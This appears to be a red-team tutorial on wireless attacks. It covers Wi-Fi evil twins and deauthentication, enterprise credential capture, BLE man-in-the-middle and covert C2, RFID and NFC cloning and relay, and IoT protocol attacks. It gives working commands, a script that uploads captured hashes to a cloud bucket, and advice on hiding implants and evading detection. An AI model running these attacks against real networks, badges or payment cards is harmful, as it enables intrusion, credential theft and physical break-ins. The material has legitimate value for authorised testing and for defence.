Practical Wireless Exploitation for Red Teams

▸The RF Attack Surface

Every wireless protocol is a perimeter you don't control. Wi-Fi bleeds through walls. Bluetooth pairs with devices in your target's pocket. RFID badges transmit credentials to readers you can emulate. IoT protocols run on firmware that hasn't been patched since the factory floor.

The red team's job is simple: find the signal, own the device, move laterally.

▸Wi-Fi

The 2.4 GHz vs 5 GHz Problem

Most corporate environments run dual-band, but the attack surface differs significantly:

• 2.4 GHz: Longer range, better wall penetration. Your deauth frames reach further. More crowded = more targets, more noise, more cover.
• 5 GHz: Shorter range, higher throughput. Enterprise APs love this band. Your reconnaissance window is smaller, but the targets are juicier.

📝 Operational Reality: In dense urban environments, 2.4 GHz is a warzone. Bring a directional antenna (e.g., Alfa AWUS036ACH with a panel antenna) to cut through the noise and hit specific floors from the street. However, modern corporate deployments prefer 5 GHz to avoid congestion. If you are targeting a high-rise, you need to account for signal polarization; window glass often attenuates vertically polarized signals. Tilt your antenna.

Evil Twin Operations

This isn't script-kiddie stuff with a Wi-Fi Pineapple and a captive portal. A proper evil twin operation requires precision.

Attack Chain:

1. Reconnaissance: Passively identify the target SSID, BSSID, and channel. Note the security type (WPA2-PSK vs. WPA2-Enterprise) and verify if 802.11w (Management Frame Protection) is enabled—if it is, standard deauths are dead on arrival.

   ~ / bash

   airodump-ng wlan0mon --bssid <TARGET_BSSID> --channel <CH> --write capture
   

2. Clone & Broadcast: Spin up a rogue AP matching the target's SSID and BSSID. Use hostapd-mana or EAPHammer for enterprise targets. Ensure your signal strength (RSSI) is at least 10dBm higher than the legitimate AP to trigger the sticky client behavior.

   ~ / bash

   # EAPHammer - Enterprise evil twin with integrated RADIUS
   ./eaphammer --interface wlan0 --essid "CorpNet" --channel 6 --auth wpa-eap --creds
   

3. Forced Roaming: Send deauthentication frames to disconnect clients from the legitimate AP. They'll auto-reconnect to your stronger signal.

   ~ / bash

   aireplay-ng -0 10 -a <TARGET_BSSID> -c <CLIENT_MAC> wlan0mon
   

4. Credential Harvesting:

   • WPA2-PSK: Capture the 4-way handshake. Crack offline.
   • WPA2-Enterprise: EAPHammer captures MSCHAPv2 challenge-response hashes. Relay or crack offline.

5. Post-Exploitation: If you captured domain credentials, you've bypassed the perimeter without touching a phishing inbox.

⚠️ WARNING: Deauth storms are loud. In high-security environments, WIDS/WIPS will flag this immediately. Use targeted deauths against single clients, not broadcast storms. Better yet, don't deauth at all—position your rogue AP closer to the target than the legitimate AP and let 802.11k/v/r assisted roaming do the work.

Physical Concealment and Drop-Boxes

To capture handshakes from specific WPA3-SAE implementations or to conduct proximity-based attacks, you need to get inside the physical perimeter without physically entering the building.

📝 Operational Reality: Drop-Box Deployment

Field Scenario: Corporate Villa Infiltration

The target is a corporate office located in a converted villa with a private garden. The internal APs are mounted on interior walls, facing outward, but the signal degrades rapidly past the landscaping.

1. The Implant: A battery-powered device (e.g., a Raspberry Pi Zero W or specialized ESP32-based implant) configured for passive monitoring and automated handshaking/PMKID capture.
2. Concealment: You don't bury the device—you camouflage it. A common tactic involves a hollowed-out plastic rock or a modified solar-powered garden light. The device is placed in the flowerbed roughly 5 meters from the external wall, under the cover of darkness.
3. Operational Security: The device is programmed with a cron job to only activate during business hours (08:00–18:00) to preserve battery and reduce detection windows. It stores captures locally and attempts to exfiltrate via a cellular LTE backhaul (using a purpose-built HAT) or by waiting for a passing operator to pull data via a hidden Wi-Fi P2P interface.
4. Result: After 48 hours, the device has captured the PMKID for the "Corp-Guest" network and a full 4-way handshake for "Corp-Internal" from a maintenance staff member's tablet connecting near the window.

Cloud Exfiltration & Cracking

Cracking WPA2/PSK on a laptop is slow. Cracking it on a desktop is faster. Cracking it in the cloud is instant. The modern workflow bypasses local storage limitations entirely.

Attack Chain:

1. Field Capture: Your drop-box or laptop captures the handshake/PMKID.
2. Automated Exfiltration: A Python script immediately converts the .cap to hc22000 (hashcat format) and uploads it to a developer-cloud storage bucket (AWS S3, Azure Blob, or GCS) via a pre-authorized API token.
3. Trigger & Spin-Up: A cloud function (AWS Lambda or Azure Function) detects the new file. It triggers an automation script (Terraform/Ansible) to spin up a GPU-optimized instance (e.g., AWS p3.2xlarge or Google n1-standard-4 with V100 GPUs) pre-loaded with the latest Hashcat and a massive rule set (OneRuleToRuleThemAll, best64).
4. Distributed Cracking: The instance mounts the storage bucket, fires up Hashcat against the hash, and runs a targeted dictionary + mask attack.
5. Notification: Once the plaintext key is recovered, it is written to a secured database, and the instance is auto-terminated to save costs. Your C2 dashboard notifies you: SSID: Corp-Admin | KEY: W3lc0meT0Th3Jungl3.

import subprocess
import boto3

subprocess.run(['hcxpcapngtool', '-o', 'hash.22000', 'capture.cap'])
s3 = boto3.client('s3')
s3.upload_file('hash.22000', 'red-team-hash-bucket', 'target_xyz.22000')

WPA2/WPA3 Enterprise Attacks

WPA2-Enterprise (802.1X/EAP):

The beauty of enterprise Wi-Fi is that it integrates with Active Directory. The danger is that most implementations are misconfigured.

• EAP-TTLS/PAP: Credentials sent in plaintext inside the TLS tunnel. Sniff and read.
• PEAP-MSCHAPv2: Challenge-response captured. Crack with asleap or relay with ntlmrelayx.
• EAP-TLS without client cert validation: Present any certificate. The AP won't verify it.

WPA3-Personal (SAE):

WPA3's Simultaneous Authentication of Equals (SAE) kills offline dictionary attacks. But Dragonblood (CVE-2019-9494, CVE-2019-9495) proved that side-channel leaks in the SAE handshake can recover the password.

📝 Operational Reality: Most enterprises haven't deployed WPA3 yet. When they do, watch for downgrade attacks—APs configured for WPA3/WPA2 transitional mode can be forced to WPA2, bringing back the 4-way handshake capture.

Rogue AP: The Insider Threat Vector

A Rogue AP isn't an evil twin—it's a physical device plugged into the corporate network. An employee brings a home router, plugs it into a conference room jack, and broadcasts "Linksys" for "convenience."

Why This Matters:

• Bypasses NAC if the port isn't 802.1X-enabled.
• Creates a bridge to the internal VLAN.
• Often sits on the same broadcast domain as corporate assets.

Detection from the Outside: Look for SSIDs that don't match the corporate naming convention but share the same BSSID OUI as corporate hardware. Or better—walk the building with a Wi-Fi scanner and map unauthorized APs to physical locations.

▸Bluetooth & BLE: The Forgotten Attack Surface

Classic Bluetooth vs BLE

BLE is where the action is. Fitness trackers, smart locks, beacons, HID devices—they all run BLE, and most implement "Just Works" pairing because users hate pressing buttons.

BLE MITM & Sniffing

Hardware:

• Ubertooth One: Classic Bluetooth sniffing, limited BLE support.
• Nordic nRF52840 Dongle: Cheap, programmable, excellent for BLE recon and MITM.
• Flipper Zero: Great for quick recon and basic attacks, but limited compared to a dedicated setup.

Attack Chain:

1. Reconnaissance: Scan for BLE devices and services.
   ~ / bash

   bettercap -eval "ble.recon on"
   

2. Enumerate GATT Services: Read characteristics, look for hardcoded credentials, device IDs, or firmware version strings that hint at known CVEs.
3. MITM Setup: Use GATTacker or a custom nRF setup to sit between the device and its paired phone. If pairing uses "Just Works," you intercept the key exchange and decrypt traffic in real-time.
4. Fuzzing & Exploitation: Once in the middle, fuzz GATT write characteristics. Smart locks and medical devices have fallen to simple buffer overflows in BLE handlers.

Real-World Impact:

• Smart Locks: Capture the unlock command, replay it later. Or better—pair your own device because the lock accepts new pairings in "setup mode."
• HID Keyboards: Inject keystrokes via BLE. If the target uses a BLE keyboard, you're one spoofed pairing away from a hardware implant.

Weaponizing BLE for C2

Standard RF attacks focus on data exfiltration, but BLE is an excellent covert channel for Command and Control (C2) on air-gapped or highly monitored systems.

The Attack Chain:

1. The Implant: Malware is installed on a compromised workstation (or a server in a restricted zone).
2. The Virtual Peripheral: The malware enumerates a virtual BLE dongle or utilizes the internal Intel Bluetooth radio. It advertises a specific, seemingly innocuous UUID (e.g., a generic "Fitness Tracker" service).
3. The Hop: A red team operator (or a compromised mobile device inside the building) walks past the target machine. They scan for the UUID and connect.
4. Data Transfer:
   • Tasking: The operator writes a specific value to a GATT characteristic. The malware reads this value as a command (e.g., 0x01 = "Dump LSASS memory to temp").
   • Exfil: The malware executes the command and writes the output (chunked) into a different GATT characteristic, which the operator reads.
5. Cover: Traffic looks like standard BLE handshakes or device maintenance. It bypasses network IDS/IPS entirely because it never touches the Ethernet or Wi-Fi card.

Classic Bluetooth PIN Brute-Force

Legacy devices still use PIN-based pairing (0000, 1234). For devices with fixed PINs:

# Using bluez tools
hcitool scan  # Discover devices
sdptool browse <MAC>  # Enumerate services

# Brute-force PIN with tools like btcrack (for legacy pairing)

Pro Tip: Vehicle infotainment systems are goldmines. They pair with phones, store contact lists, and often run outdated Bluetooth stacks with known RCE vulnerabilities.

▸RFID & NFC: Cloning, Relaying, and Skimming

The RFID Spectrum

• 125 kHz (LF): HID Prox, EM4100. No encryption. Trivial to clone.
• 13.56 MHz (HF/NFC): Mifare Classic, Mifare DESFire, HID iCLASS. Mifare Classic uses Crypto-1 (broken). DESFire uses AES (secure if implemented correctly).
• UHF (860-960 MHz): Supply chain, vehicle tracking. Often unencrypted, long-range readable.

Mifare Classic: The Gift That Keeps Giving

Mifare Classic cards are still deployed in access control systems worldwide despite Crypto-1 being broken for over a decade.

Attack Chain:

1. Identify: Use a Proxmark3 or Flipper Zero to read the card's UID and determine the type.
   ~ / bash

   # Proxmark3
   hf search
   

2. Dump: If it's Mifare Classic, recover the keys and dump all sectors.
   ~ / bash

   # Proxmark3 - automated key recovery and dump
   hf mf autopwn
   

3. Clone: Write the dump to a blank Chinese Magic Card (UID writable).
   ~ / bash

   hf mf cload -f dump.bin
   

4. Emulate: Use the Proxmark3 to emulate the card in real-time, bypassing physical possession requirements.
   ~ / bash

   hf mf sim --uid <TARGET_UID>
   

⚠️ WARNING: Mifare Classic's Crypto-1 is broken via the Darkside attack (offline) and Nested attack (requires one known key). If you have a valid reader, you can often recover all keys in under a minute.

NFC Relay Attacks

Relay attacks don't crack encryption—they extend it. Two attackers, one near the victim's card, one near the reader, bridge the communication in real-time.

Setup:

• Attacker 1: Proxmark3 or Flipper Zero in sniff/relay mode, held near the victim's pocket/bag.
• Attacker 2: Proxmark3 or custom antenna near the target reader.
• Link: Low-latency connection (cellular, Wi-Fi, or dedicated radio) between the two devices.

The reader thinks the card is present. The transaction completes. The victim doesn't know it happened.

Defensive Note: This works against contactless payments, building access, and transit cards. The only defense is distance bounding (not implemented in most systems) or Faraday pouches.

HID Prox & LF RFID

125 kHz cards are the easiest target. No encryption, just a UID.

# Proxmark3 - read HID Prox card
lf hid read

# Clone to T5577 writable tag
lf hid clone -r <RAW_DATA>

📝 Operational Reality: Many buildings still use HID Prox. If you find one, you've found physical access. Period.

▸IoT & Proprietary Wireless: The Protocol Graveyard

Zigbee: Mesh of Doom

Zigbee networks use a network key for encryption. The problem? Many devices ship with default link keys (e.g., ZigBeeAlliance09), and if you capture the network join process, you recover the network key.

Attack Chain:

1. Sniff Traffic: Use a CC2531 USB dongle with Zigbee2MQTT or a HackRF One to capture 2.4 GHz traffic.
2. Capture Join: Wait for (or force) a device to join the network. The transport key is encrypted with the known link key.
3. Decrypt: Recover the network key and decrypt all subsequent traffic.
4. Inject: With the network key, craft malicious ZCL commands. Turn off alarms, unlock doors, or pivot to the IP network via the Zigbee gateway.

Case Study: Philips Hue (CVE-2020-6007) Compromise a single bulb via its Zigbee OTA update mechanism, push malware to the Hue bridge, and pivot to the home/corporate network. The bulb is your entry point.

Z-Wave: Downgrade to Disaster

Z-Wave S2 security uses ECDH key exchange. But if the controller accepts S0 devices, an attacker can force a downgrade during inclusion.

The Z-Shave Attack:

1. Spoof an S0-capable device during pairing.
2. The controller downgrades from S2 to S0.
3. S0 encrypts the network key with static zeroes. Sniff and recover.
4. Full network access achieved.

Target: Smart locks, garage door controllers, alarm systems. Once you have the network key, you control every device.

LoRaWAN: Long-Range, Long-Exposure

LoRa devices are deployed in agriculture, utilities, and smart cities—often in remote locations with no physical security.

Attack Vectors:

• ABP (Activation by Personalisation): Static keys hardcoded in firmware. Extract firmware via JTAG/SWD, recover keys, impersonate the device.
• OTAA Downgrade: Force a device to rejoin using ABP. If the device supports both, you can bypass OTAA's session key rotation.
• Replay: If frame counters reset (device reset, battery swap), replay captured uplink messages. The server accepts them.

Hardware: HackRF One, LimeSDR, or a cheap LoRa module (RAK811, SX1276) with custom firmware.

Infrared: The Invisible Vector

IR isn't dead. Conference room TVs, projectors, and industrial HVAC systems still use it. No encryption, no authentication.

Attack Chain:

1. Capture IR signals with an IR receiver (TSOP38238 + Arduino/Raspberry Pi).
2. Decode the protocol (NEC, RC5, RC6, Sony).
3. Replay commands from a custom IR LED array.
4. Turn off displays during presentations, change thermostat settings to trigger HVAC alerts, or disable projectors during critical meetings.

Red Team Value: Distraction, disruption, and social engineering cover. A malfunctioning conference room is a great pretext for "IT support" to enter a restricted area.

▸Hardware Toolkit

▸Operational Security Notes

• RF Signature: Your attack hardware has a unique RF signature. In high-security environments, WIDS/WIPS may fingerprint your Alfa card or Proxmark3 transmissions. Use directional antennas to minimize broadcast footprint.
• Legal Frequencies: Transmitting on licensed bands (cellular, emergency services) is illegal without authorization. Stick to ISM bands (2.4 GHz, 5 GHz, 915 MHz, etc.) unless you have explicit written permission.
• Physical Presence: Wireless attacks often require proximity. Dress the part. A laptop in a coffee shop is normal. A directional antenna pointed at a building is not.
• Logging: Assume everything you transmit is logged. Use throwaway hardware for high-risk ops. MAC address randomization is your friend.

▸Conclusion

Wireless is not a secondary, legacy threat vector—it is a live, critical bridge straight into the heart of corporate infrastructure. The physical security perimeter ends where the RF signal propagates, and as modern enterprises lock down their web perimeters and endpoints, the airwaves remain uniquely vulnerable, noisy, and often entirely unmonitored.

Bypassing physical security with camouflaged drop-boxes, routing data out over cellular links, or using Bluetooth for out-of-band Command and Control (C2) shows that the spectrum is limited only by an operator's creativity. Securing this space requires more than regular patching; it demands physical security awareness, active spectrum monitoring, and strict implementation of verified cryptographic standards.

▸References & Further Reading

• Wi-Fi & Enterprise Attacks:

  • EAPHammer (RADIUS/WPA-Enterprise attack framework): github.com/s0lst1c3/eaphammer
  • hostapd-mana (Rogue AP toolset): github.com/sensepost/hostapd-mana

• Bluetooth & BLE:

  • GATTacker (BLE MITM & GATT manipulation): github.com/securing/GATTacker
  • Bettercap (WiFi, BLE, and wireless testing engine): github.com/bettercap/bettercap

• RFID & NFC Access Control:

  • Nested and Darkside Attacks against Mifare Classic (Crypto-1): proxmark.org
  • Proxmark3 RDV4 Firmware & Client: github.com/RfidResearchGroup/proxmark3

• IoT & Smart Infrastructure:

  • Zigbee Alliance Security Standards and link key weaknesses: csa-iot.org
  • Z-Wave S2 Security Downgrade research (Z-Shave): blackhat.com